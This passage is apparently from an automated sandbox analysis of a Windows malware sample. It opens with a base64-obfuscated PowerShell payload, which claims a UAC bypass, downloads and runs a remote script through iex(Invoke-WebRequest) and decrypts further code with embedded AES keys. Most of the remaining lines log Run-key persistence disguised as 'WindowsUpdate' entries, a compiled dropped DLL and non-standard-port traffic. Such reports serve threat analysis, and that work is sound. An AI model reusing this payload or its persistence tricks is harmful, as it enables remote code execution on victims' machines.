1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F17C50 push FFFFFFC3h; ret 13_2_04F17C6A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1343F pushfd ; iretd 13_2_04F13459
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F13AD2 push ebx; retf 13_2_04F13ADA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07748E48 push 800305D3h; ret 13_2_07749075
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_086D51C2 pushad ; retf 13_2_086D51D9
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ilcg05nv.dllJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_589
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_542Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_802
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_387
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_540
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_542Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_542Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_589
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_589
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_387
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_387
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_802
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_802
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_540
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_540

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49708
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
